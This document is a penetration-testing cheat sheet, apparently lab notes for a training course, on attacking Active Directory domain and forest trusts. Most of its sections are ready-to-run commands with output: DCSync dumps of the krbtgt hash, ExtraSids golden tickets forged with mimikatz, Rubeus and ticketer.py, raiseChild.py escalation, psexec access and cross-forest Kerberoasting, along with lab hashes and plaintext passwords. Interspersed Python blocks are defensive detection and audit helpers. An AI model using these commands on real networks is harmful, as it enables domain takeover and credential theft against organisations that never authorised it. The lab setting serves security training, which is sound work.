# Trust Attacks

### Enumeration

```powershell
Import-Module activedirectory
Get-ADTrust -Filter *
```

```powershell
Import-Module .\Powerview.ps1
Get-DomainTrust
Get-DomainTrustMapping
```

#### Checking Users in the Child Domain using Get-DomainUser

```powershell
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```

#### Using netdom to query domain trust

```powershell
netdom query /domain:inlanefreight.local trust
```

#### Using netdom to query domain controllers

```powershell
netdom query /domain:inlanefreight.local dc
```

#### Using netdom to query workstations and servers

```powershell
netdom query /domain:inlanefreight.local workstation
```

### Attacking Domain Trusts - Child to Parent Trust - from Windows

#### SID History Primer

The [sidHistory](https://learn.microsoft.com/en-us/windows/win32/adschema/a-sidhistory) attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.\
SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket-granting ticket (TGT), which will allow us to authenticate as any account in the domain of our choosing for further persistence.
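As an added illustration (not part of the original notes), the following Python models why the SID history / ExtraSids technique works across a child/parent trust but is stripped by a filtered external trust. It decodes the `TrustAttributes` integer that `Get-ADTrust` and PowerView's `Get-DomainTrust` return, applies a simplified SID-filtering rule, and flags foreign privileged SIDs in a ticket's SID list, which is what a reviewer of PAC or sidHistory data looks for. The flag values are the MS-ADTS `TrustAttributes` bits; the sample SIDs are the ones used on this page, and the user RID `1105` is made up.

```python
from __future__ import annotations
import re

# TrustAttributes flags (MS-ADTS 6.1.6.7.9); this is the integer that Get-ADTrust
# and PowerView's Get-DomainTrust report as TrustAttributes.
TRUST_ATTRIBUTES = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",  # "SID filtering quarantined" on an external trust
    0x008: "FOREST_TRANSITIVE",   # forest trust; SID filtering is always on
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",       # parent/child or tree-root trust; SIDs are never filtered
    0x040: "TREAT_AS_EXTERNAL",
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
}

# Well-known RIDs of the most privileged domain principals (MS-DTYP 2.4.2.4).
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)(?:-(\d+))?$")


def decode_trust_attributes(value: int) -> set[str]:
    """Expand a TrustAttributes integer into the names of the flags that are set."""
    return {name for bit, name in TRUST_ATTRIBUTES.items() if value & bit}


def sid_filtering_applies(value: int) -> bool:
    """Simplified model of whether the trusting DC strips foreign SIDs on this trust:
    never inside a forest, always on a forest trust, and on an external trust only
    when it is quarantined."""
    flags = decode_trust_attributes(value)
    if "WITHIN_FOREST" in flags:
        return False
    return bool(flags & {"QUARANTINED_DOMAIN", "FOREST_TRANSITIVE"})


def split_sid(sid: str) -> tuple[str, int | None]:
    """Split 'S-1-5-21-a-b-c-rid' into (domain SID, rid); rid is None for a bare domain SID."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), (int(m.group(2)) if m.group(2) else None)


def filter_token_sids(trusted_domain_sids: set[str], sids: list[str], trust_attributes: int) -> list[str]:
    """Model what survives of a ticket's SIDs (user, groups, SID history / ExtraSids)
    when it crosses a trust: with SID filtering every SID whose domain part is not one
    of the trusted domains is dropped, otherwise everything is kept."""
    if not sid_filtering_applies(trust_attributes):
        return list(sids)
    return [s for s in sids if split_sid(s)[0] in trusted_domain_sids]


def foreign_privileged_sids(issuing_domain_sid: str, sids: list[str]) -> list[tuple[str, str]]:
    """Flag SIDs that belong to a different domain than the ticket issuer AND carry a
    privileged well-known RID: a child-domain ticket carrying the root domain's
    Enterprise Admins SID is exactly the ExtraSids pattern described above."""
    hits = []
    for s in sids:
        domain, rid = split_sid(s)
        if domain != issuing_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((s, PRIVILEGED_RIDS[rid]))
    return hits


# Constructed sample using the SIDs from this page: a child-domain user (RID 1105 is
# made up), Domain Users, and the injected Enterprise Admins SID of the root domain.
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"
ROOT_EA_SID = "S-1-5-21-3842939050-3880317879-2865463114-519"
TICKET_SIDS = [CHILD_SID + "-1105", CHILD_SID + "-513", ROOT_EA_SID]

if __name__ == "__main__":
    print(decode_trust_attributes(0x20))
    print(filter_token_sids({CHILD_SID}, TICKET_SIDS, 0x20))  # parent/child: EA SID survives
    print(filter_token_sids({CHILD_SID}, TICKET_SIDS, 0x04))  # quarantined external: EA SID stripped
    print(foreign_privileged_sids(CHILD_SID, TICKET_SIDS))
```

The model is deliberately narrow: it does not reproduce every rule of forest-aware SID filtering, only the distinction that matters here, namely that an intra-forest trust passes every SID through and a filtered trust keeps only SIDs from the trusted side.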

* <https://www.thehacker.recipes/ad/persistence/sid-history>

#### Extra SID - Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised. It requires:

* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain
* The SID of the Enterprise Admins group of the root domain

With this data collected, the attack can be performed with Mimikatz.

**Obtaining the KRBTGT Account's NT Hash using Mimikatz**

```powershell
PS C:\htb> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
```

**Get-DomainSID**\
We can use the PowerView `Get-DomainSID` function to get the SID for the child domain, but this is also visible in the Mimikatz output above.

```powershell
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689
```

**Obtaining Enterprise Admins Group's SID using Get-DomainGroup**

```powershell
# using activedirectory module
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# using powerview
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

* The KRBTGT hash for the child domain: `9d765b482771505cbe97411065964d5f`
* The SID for the child domain: `S-1-5-21-2806153819-209893948-922872689`
* The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: `hacker`
* The FQDN of the child domain: `LOGISTICS.INLANEFREIGHT.LOCAL`
* The SID of the Enterprise Admins group of the root domain: `S-1-5-21-3842939050-3880317879-2865463114-519`

**Creating Golden Ticket with Mimikatz**

```powershell
PS C:\htb> .\mimikatz.exe
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
```

**Confirming a Kerberos Ticket is in Memory Using klist**

```powershell
PS C:\htb> klist
```

#### Extra SID Attack - Rubeus

```powershell
PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```

#### Performing a DCSync Attack

```powershell
PS C:\Tools> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL
```

### Attacking Domain Trusts - Child to Parent Trust - from Linux

This attack allows for the compromise of a parent domain once the child domain has been compromised. We'll still need to gather the same bits of information:

* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain
* The SID of the Enterprise Admins group of the root domain

#### Performing DCSync using secretsdump.py in the Child Domain

```bash
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e
krbtgt:des-cbc-md5:fee04c3d026d7538
[*] Cleaning up..
```

#### Performing SID Brute Forcing using lookupsid.py

```bash
lookupsid.py logistics.inlanefreight.local/[email protected]
Password:
[*] Brute forcing SIDs at 172.16.5.240
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
```

#### Looking for the Domain SID

```bash
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Password:
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
```

#### Grabbing the Domain SID & Attaching to Enterprise Admin's RID

```bash
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
Password: 
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114 
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup) 
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser) 
502: INLANEFREIGHT\krbtgt (SidTypeUser) 
512: INLANEFREIGHT\Domain Admins (SidTypeGroup) 
513: INLANEFREIGHT\Domain Users (SidTypeGroup) 
514: INLANEFREIGHT\Domain Guests (SidTypeGroup) 
515: INLANEFREIGHT\Domain Computers (SidTypeGroup) 
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup) 
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias) 
518: INLANEFREIGHT\Schema Admins (SidTypeGroup) 
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)
```

* The KRBTGT hash for the child domain: `9d765b482771505cbe97411065964d5f`
* The SID for the child domain: `S-1-5-21-2806153819-209893948-922872689`
* The name of a target user in the child domain (does not need to exist!): `hacker`
* The FQDN of the child domain: `LOGISTICS.INLANEFREIGHT.LOCAL`
* The SID of the Enterprise Admins group of the root domain: `S-1-5-21-3842939050-3880317879-2865463114-519`

#### Constructing a Golden Ticket using ticketer.py

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
...
[*] Saving ticket in hacker.ccache
```

```bash
export KRB5CCNAME=hacker.ccache

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
```

#### Performing the Attack with raiseChild.py

```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```

### Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

#### Cross-Forest Kerberoasting

**Enumerating Accounts for Associated SPNs Using Get-DomainUser**

```powershell
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname 
-------------- 
krbtgt 
mssqlsvc
```

**Enumerating the mssqlsvc Account**

```powershell
PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof 
-------------- -------- 
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

```

**Performing a Kerberoasting Attack with Rubeus Using the /domain Flag**

```powershell
PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
[*] Total kerberoastable users : 1
[*] SamAccountName         : mssqlsvc
[*] DistinguishedName      : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL
[*] ServicePrincipalName   : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet             : 3/24/2022 12:47:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:*$<SNIP>
```
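Two things in the Rubeus output above matter to a defender: `Supported ETypes : RC4_HMAC_DEFAULT` (the account has no `msDS-SupportedEncryptionTypes` value, so RC4 tickets are issued) and the `$krb5tgs$23$` prefix (etype 23 = RC4-HMAC, the crackable case). The Python below is an added example, not from the original notes: it reads the etype from such a hash string, decides whether an account's `msDS-SupportedEncryptionTypes` still permits RC4, and runs the classic Kerberoasting heuristic (RC4 service tickets for non-computer, non-krbtgt service accounts, bursts per requester) over a constructed list of events shaped after the fields of Windows event 4769. The `svc_web` account and the client addresses are made up.

```python
from __future__ import annotations
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23; AES128-CTS = 0x11, AES256-CTS = 0x12

# msDS-SupportedEncryptionTypes bits (MS-KILE 2.2.7).
SUPPORTED_ETYPE_BITS = {0x01: "DES_CBC_CRC", 0x02: "DES_CBC_MD5", 0x04: "RC4_HMAC",
                        0x08: "AES128_CTS_HMAC_SHA1_96", 0x10: "AES256_CTS_HMAC_SHA1_96"}

# Constructed sample, shaped after the fields of Windows event 4769
# ("A Kerberos service ticket was requested"); not real log data.
SAMPLE_4769 = [
    {"Account Name": "wley@INLANEFREIGHT.LOCAL", "Service Name": "mssqlsvc",
     "Ticket Encryption Type": "0x17", "Client Address": "::ffff:172.16.5.25"},
    {"Account Name": "wley@INLANEFREIGHT.LOCAL", "Service Name": "ACADEMY-EA-DC03$",
     "Ticket Encryption Type": "0x12", "Client Address": "::ffff:172.16.5.25"},
    {"Account Name": "wley@INLANEFREIGHT.LOCAL", "Service Name": "krbtgt",
     "Ticket Encryption Type": "0x12", "Client Address": "::ffff:172.16.5.25"},
    {"Account Name": "forend@INLANEFREIGHT.LOCAL", "Service Name": "mssqlsvc",
     "Ticket Encryption Type": "0x12", "Client Address": "::ffff:172.16.5.30"},
    {"Account Name": "wley@INLANEFREIGHT.LOCAL", "Service Name": "svc_web",
     "Ticket Encryption Type": "0x17", "Client Address": "::ffff:172.16.5.25"},
]


def hash_etype(krb5tgs: str) -> int:
    """Read the etype from a '$krb5tgs$<etype>$...' string (23 = RC4-HMAC, 17/18 = AES)."""
    parts = krb5tgs.split("$")
    if len(parts) < 3 or parts[1] != "krb5tgs" or not parts[2].isdigit():
        raise ValueError("not a $krb5tgs$ ticket string")
    return int(parts[2])


def decode_supported_etypes(value: int) -> set[str]:
    """Expand an msDS-SupportedEncryptionTypes integer into the names of the bits set."""
    return {name for bit, name in SUPPORTED_ETYPE_BITS.items() if value & bit}


def rc4_still_allowed(msds_supported_enctypes: int | None) -> bool:
    """True when a service account will still be issued RC4 tickets: the attribute is
    unset / 0 (Rubeus prints RC4_HMAC_DEFAULT) or the RC4 bit is set."""
    if not msds_supported_enctypes:
        return True
    return "RC4_HMAC" in decode_supported_etypes(msds_supported_enctypes)


def is_kerberoast_like(event: dict) -> bool:
    """RC4 service ticket for a user (non-computer, non-krbtgt) service account."""
    svc = event["Service Name"]
    etype = int(event["Ticket Encryption Type"], 16)
    return etype == RC4_HMAC and svc.lower() != "krbtgt" and not svc.endswith("$")


def kerberoast_candidates(events: list[dict]) -> list[dict]:
    """Events worth a second look under the heuristic above."""
    return [e for e in events if is_kerberoast_like(e)]


def requesters_over_threshold(events: list[dict], threshold: int = 2) -> dict[str, set[str]]:
    """Accounts that pulled RC4 tickets for at least `threshold` distinct service accounts,
    the burst pattern a tool like GetUserSPNs.py -request or Rubeus kerberoast produces."""
    per_account: dict[str, set[str]] = defaultdict(set)
    for e in kerberoast_candidates(events):
        per_account[e["Account Name"]].add(e["Service Name"])
    return {acct: svcs for acct, svcs in per_account.items() if len(svcs) >= threshold}


if __name__ == "__main__":
    for e in kerberoast_candidates(SAMPLE_4769):
        print("RC4 TGS:", e["Account Name"], "->", e["Service Name"], "from", e["Client Address"])
    print(requesters_over_threshold(SAMPLE_4769))
    print("RC4 allowed with attribute unset:", rc4_still_allowed(0))
    print("RC4 allowed with AES128|AES256 only:", rc4_still_allowed(0x18))
```

The mitigation that follows from `rc4_still_allowed` is to set `msDS-SupportedEncryptionTypes` on service accounts to AES only (0x18) and rotate their passwords so AES keys exist; once that is done, the same 4769 heuristic becomes far more selective because legitimate clients stop requesting RC4 tickets.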

#### Admin Password Re-Use & Group Membership

From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company.

```powershell
PS C:\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500
INLANEFREIGHT\administrator
```

```powershell
PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL
```
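The audit behind this section is: which principals from the other forest sit in high-value groups of this one, and who are they? As an added example (not the page's or PowerView's own code), the Python below parses the list-style text that `Get-DomainForeignGroupMember` prints, resolves each foreign SID through a lookup table that stands in for `Convert-SidToName`, and reports the foreign principals found in high-value groups. The sample output reuses the record shown above plus a second constructed record for `Remote Desktop Users`; the `bdavis` account and RID `1145` are made up, as is the lookup table.

```python
from __future__ import annotations
import re

# Constructed sample of the list-style output PowerView's Get-DomainForeignGroupMember
# prints: one record per blank-line-separated block, "Key : Value" per line.
SAMPLE_OUTPUT = """\
GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL

GroupDomain             : FREIGHTLOGISTICS.LOCAL
GroupName               : Remote Desktop Users
GroupDistinguishedName  : CN=Remote Desktop Users,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL
MemberDomain            : FREIGHTLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-1145
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-1145,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL
"""

# Constructed lookup tables standing in for a directory query (what Convert-SidToName
# does on the page). RID 1145 / bdavis is made up.
DOMAIN_SIDS = {
    "S-1-5-21-3842939050-3880317879-2865463114": "INLANEFREIGHT",
    "S-1-5-21-2806153819-209893948-922872689": "LOGISTICS",
}
RID_NAMES = {500: "administrator", 1145: "bdavis"}

# Groups whose foreign members deserve review; extend to taste.
HIGH_VALUE_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins",
                     "Account Operators", "Schema Admins"}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def parse_records(text: str) -> list[dict[str, str]]:
    """Turn PowerShell list-format output into one dict per record."""
    records: list[dict[str, str]] = []
    current: dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def resolve_sid(sid: str) -> str:
    """Map a domain SID to DOMAIN\\name using the lookup tables; unknown parts stay raw."""
    m = SID_RE.match(sid)
    if not m:
        return sid
    domain = DOMAIN_SIDS.get(m.group(1), m.group(1))
    name = RID_NAMES.get(int(m.group(2)), f"RID {m.group(2)}")
    return f"{domain}\\{name}"


def foreign_high_value_members(records: list[dict[str, str]]) -> list[tuple[str, str]]:
    """(group, resolved member) for foreign security principals in high-value groups."""
    hits = []
    for r in records:
        is_foreign = "ForeignSecurityPrincipals" in r.get("MemberDistinguishedName", "")
        if is_foreign and r.get("GroupName") in HIGH_VALUE_GROUPS:
            hits.append((f"{r['GroupDomain']}\\{r['GroupName']}", resolve_sid(r["MemberName"])))
    return hits


if __name__ == "__main__":
    for group, member in foreign_high_value_members(parse_records(SAMPLE_OUTPUT)):
        print(f"{member} is a member of {group}")
```

A hit like `INLANEFREIGHT\administrator` in `FREIGHTLOGISTICS.LOCAL\Administrators` is exactly the situation the section describes; the remediation is to remove cross-forest membership in built-in admin groups and, where the same team genuinely administers both forests, to use distinct accounts and passwords per forest.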

### Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

#### Cross-Forest Kerberoasting

```bash
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

```bash
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

**Hunting Foreign Group Membership with Bloodhound-python**

* First domain

```bash
cat /etc/resolv.conf
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain INLANEFREIGHT.LOCAL 
nameserver 172.16.5.5
```

```bash
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
```

* Second domain

```bash
cat /etc/resolv.conf 
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) 
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN 
# 127.0.0.53 is the systemd-resolved stub resolver. 
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain FREIGHTLOGISTICS.LOCAL 
nameserver 172.16.5.238
```

```bash
bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u [email protected] -p Klmcargo
```

Upload both data sets (first and second domain) to BloodHound and select the pre-built query:

* `Users with Foreign Domain Group Membership`

